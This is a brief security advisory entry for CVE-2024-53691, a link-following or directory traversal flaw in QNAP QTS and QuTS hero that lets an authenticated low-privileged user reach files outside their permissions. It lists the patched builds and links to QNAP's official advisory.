CVE-2024-53691
Overview
This vulnerability is a directory traversal flaw rooted in improper validation of file system paths within QNAP QTS operating system components. The affected functionality fails to correctly sanitize user-supplied input used to reference file locations, enabling traversal beyond intended directories. The issue impacts file management and access control mechanisms in multiple QNAP QTS and QuTS hero versions prior to specified builds.
Vulnerability Description
A link following vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained user access to traverse the file system to unintended locations. We have already fixed the vulnerability in the following versions: QTS 5.1.8.2823 build 20240712 and later QTS 5.2.0.2802 build 20240620 and later QuTS hero h5.1.8.2823 build 20240712 and later QuTS hero h5.2.0.2802 build 20240620 and later
Impact
An attacker with valid user credentials can exploit this vulnerability to traverse the file system and access sensitive files or directories beyond their permission scope. This unauthorized access can lead to exposure of confidential data, configuration files, or system information. The prerequisite is possession of a low-privileged account on the affected QNAP device. Successful exploitation may facilitate lateral movement or escalation within the network environment, potentially compromising business operations reliant on the affected storage systems.
Solution
QNAP has addressed this vulnerability in QTS versions 5.1.8.2823 build 20240712 and later, QTS 5.2.0.2802 build 20240620 and later, as well as QuTS hero h5.1.8.2823 build 20240712 and later and h5.2.0.2802 build 20240620 and later. Administrators should upgrade affected systems to these versions promptly. Detailed patch instructions and advisory information are available at QNAP’s official security advisory page: https://www.qnap.com/en/security-advisory/qsa-24-28
